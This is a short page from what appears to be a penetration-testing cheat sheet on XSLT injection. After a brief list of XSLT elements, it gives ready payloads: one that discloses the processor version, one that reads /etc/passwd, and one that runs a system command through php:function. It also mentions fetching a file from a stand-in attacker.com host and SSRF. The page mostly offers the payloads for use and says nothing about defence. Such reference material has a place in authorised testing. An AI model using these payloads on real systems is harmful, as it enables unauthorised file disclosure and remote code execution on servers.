search
LinkedInGithub
githubEdit

XSLT Injection

hashtag
Common XSLT Elements:

  • <xsl:template> → Defines an XSL template.

  • <xsl:value-of> → Extracts XML values.

  • <xsl:for-each> → Loops through XML nodes.

  • <xsl:if> → Tests conditions.

hashtag
XSLT Injection Payloads:

hashtag
Information Disclosure:

<xsl:value-of select="system-property('xsl:version')" />

hashtag
Local File Inclusion (LFI):

<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')" />

hashtag
Remote Code Execution (RCE):

<xsl:value-of select="php:function('system','id')" />

hashtag
Advanced XSLT Exploits:

  • XXE via XSLT: Using document('http://attacker.com/payload.xml') to retrieve malicious data.

  • Network SSRF via XSLT: Fetching internal/external resources.

Previousxml-rpc-attacksNextidor

Last updated